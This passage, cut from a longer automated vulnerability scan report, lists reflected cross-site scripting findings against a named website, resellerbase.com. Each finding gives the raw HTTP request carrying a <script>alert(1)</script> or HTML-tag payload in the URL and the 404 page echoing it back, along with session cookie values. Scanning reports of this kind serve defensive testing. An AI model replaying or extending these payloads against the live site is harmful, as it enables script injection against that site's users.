Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2&37cc2<script>alert(1)</script>4be5ef95ff0=1 was not found on this server.</p>
...[SNIP]...

2.1826. http://www.resellerbase.com/detail/22/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b92aa<a>dde48258198 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2b92aa<a>dde48258198 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/search.php?keyword=search...&Submit3=Search&opt=2b92aa<a>dde48258198 was not found on this server.</p>
...[SNIP]...

2.1827. http://www.resellerbase.com/detail/23/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92e36<script>alert(1)</script>a7d886cdb37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail92e36<script>alert(1)</script>a7d886cdb37/23/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail92e36<script>alert(1)</script>a7d886cdb37/23/ was not found on this server.</p>
...[SNIP]...

2.1828. http://www.resellerbase.com/detail/23/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88bd9<script>alert(1)</script>3cc86507b0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2388bd9<script>alert(1)</script>3cc86507b0a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2388bd9<script>alert(1)</script>3cc86507b0a/ was not found on this server.</p>
...[SNIP]...

2.1829. http://www.resellerbase.com/detail/23/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4eb75<script>alert(1)</script>601295a1f17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/?4eb75<script>alert(1)</script>601295a1f17=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/?4eb75<script>alert(1)</script>601295a1f17=1 was not found on this server.</p>
...[SNIP]...

2.1830. http://www.resellerbase.com/detail/23/pinnaclecart-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/pinnaclecart-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c043<script>alert(1)</script>7ce810c0e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4c043<script>alert(1)</script>7ce810c0e4a/23/pinnaclecart-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4c043<script>alert(1)</script>7ce810c0e4a/23/pinnaclecart-com.html was not found on this server.</p>
...[SNIP]...

2.1831. http://www.resellerbase.com/detail/23/pinnaclecart-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/pinnaclecart-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91115<a>070576924f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/2391115<a>070576924f/pinnaclecart-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2391115<a>070576924f/pinnaclecart-com.html was not found on this server.</p>
...[SNIP]...

2.1832. http://www.resellerbase.com/detail/23/pinnaclecart-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/pinnaclecart-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76b3b<script>alert(1)</script>9acb54b40fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/76b3b<script>alert(1)</script>9acb54b40fb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/76b3b<script>alert(1)</script>9acb54b40fb was not found on this server.</p>
...[SNIP]...

2.1833. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dbed4<script>alert(1)</script>3901b444b8ce960a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaildbed4<script>alert(1)</script>3901b444b8ce960a6/23/rating.php?id=23&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildbed4<script>alert(1)</script>3901b444b8ce960a6/23/rating.php?id=23&rating=5 was not found on this server.</p>
...[SNIP]...

2.1834. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a432<script>alert(1)</script>c2ab00db4bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5a432<script>alert(1)</script>c2ab00db4bf/23/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5a432<script>alert(1)</script>c2ab00db4bf/23/rating.php was not found on this server.</p>
...[SNIP]...

2.1835. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ea85<script>alert(1)</script>bb20017e5f1fc3060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/235ea85<script>alert(1)</script>bb20017e5f1fc3060/rating.php?id=23&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/235ea85<script>alert(1)</script>bb20017e5f1fc3060/rating.php?id=23&rating=5 was not found on this server.</p>
...[SNIP]...

2.1836. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6e2f<script>alert(1)</script>9dab7d518d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23c6e2f<script>alert(1)</script>9dab7d518d6/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23c6e2f<script>alert(1)</script>9dab7d518d6/rating.php was not found on this server.</p>
...[SNIP]...

2.1837. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c5d2f<script>alert(1)</script>45fc397f845 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/rating.phpc5d2f<script>alert(1)</script>45fc397f845 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/rating.phpc5d2f<script>alert(1)</script>45fc397f845 was not found on this server.</p>
...[SNIP]...

2.1838. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f7e69<script>alert(1)</script>22b2c8256a2db45db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/23/rating.phpf7e69<script>alert(1)</script>22b2c8256a2db45db?id=23&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/rating.phpf7e69<script>alert(1)</script>22b2c8256a2db45db?id=23&rating=5 was not found on this server.</p>
...[SNIP]...

2.1839. http://www.resellerbase.com/detail/23/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6db7<script>alert(1)</script>2397e5e06ab403f7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/23/rating.php/b6db7<script>alert(1)</script>2397e5e06ab403f7a?id=23&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/rating.php/b6db7<script>alert(1)</script>2397e5e06ab403f7a?id=23&rating=5 was not found on this server.</p>
...[SNIP]...

2.1840. http://www.resellerbase.com/detail/23/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7fcf1<script>alert(1)</script>58be5611895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/rating.php?7fcf1<script>alert(1)</script>58be5611895=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/rating.php?7fcf1<script>alert(1)</script>58be5611895=1 was not found on this server.</p>
...[SNIP]...

2.1841. http://www.resellerbase.com/detail/23/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 634d4<script>alert(1)</script>e1845032298 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail634d4<script>alert(1)</script>e1845032298/23/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail634d4<script>alert(1)</script>e1845032298/23/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1842. http://www.resellerbase.com/detail/23/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0caa<script>alert(1)</script>ba92e4d73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23c0caa<script>alert(1)</script>ba92e4d73/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23c0caa<script>alert(1)</script>ba92e4d73/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1843. http://www.resellerbase.com/detail/23/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 191db<script>alert(1)</script>389db976dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/search.php191db<script>alert(1)</script>389db976dc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php191db<script>alert(1)</script>389db976dc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1844. http://www.resellerbase.com/detail/23/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8846d<a>6959bebb13d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/search.php?keyword=search...&Submit3=Search8846d<a>6959bebb13d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

